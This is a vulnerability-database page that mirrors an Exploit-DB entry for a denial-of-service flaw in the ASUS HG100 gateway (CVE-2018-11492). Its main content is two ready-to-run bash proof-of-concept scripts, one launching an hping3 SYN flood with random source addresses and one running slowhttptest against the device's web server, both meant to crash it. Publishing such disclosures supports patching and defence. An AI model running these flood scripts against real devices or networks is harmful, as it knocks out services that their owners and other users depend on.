Lucene search
K

ASUS HG100 - Denial of Service

🗓️ 17 Apr 2019 00:00:00Reported by YinT WangType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 98 Views

ASUS HG100 Denial of Service via IPv4 packets and SlowHTTPDO

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ASUS HG100 - Denial of Service Exploit
17 Apr 201900:00
zdt
CNVD
ASUS HG100 Denial of Service Vulnerability
13 Aug 201800:00
cnvd
Check Point Advisories
ASUS HG100 Devices Denial of Service (CVE-2018-11492)
23 Apr 201900:00
checkpoint_advisories
CVE
CVE-2018-11492
10 Aug 201816:00
cve
Cvelist
CVE-2018-11492
10 Aug 201816:00
cvelist
exploitpack
ASUS HG100 - Denial of Service
17 Apr 201900:00
exploitpack
NVD
CVE-2018-11492
10 Aug 201816:29
nvd
Packet Storm
ASUS HG100 Denial Of Service
17 Apr 201900:00
packetstorm
Prion
Design/Logic Flaw
10 Aug 201816:29
prion
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
# Date: 2019-04-14 # Exploit Author: YinT Wang; 
# Vendor Homepage: www.asus.com 
# Version: Hardware version: HG100 、Firmware version:  1.05.12   
# Tested on: Currnet 1.05.12 
# CVE : CVE-2018-11492

1. Description 
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).

2.Proof of Concept
Just Execute the following script in kali which could crash the devices

    1. IPv4 packet and in result of devices crash.which written in linux script.

        #needed to co-operate with hping3 tool
        #with the time period at least 220s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 here " url
        hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
        sleep 220
        echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
        exit 0

    2.Slowhttp test and caused the devices crash.which written in linux script.

        #needed to co-operate with slowhttptest tool
        #with the time period 600s which could cause web server of HG100 devices crash
        #!/bin/bash
        read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
        slowhttptest -H -R -c 10000 -l 600 -u $url
        sleep 600
        echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
        exit 0

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2019 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 37.5
CVSS 27.8
EPSS0.08924
98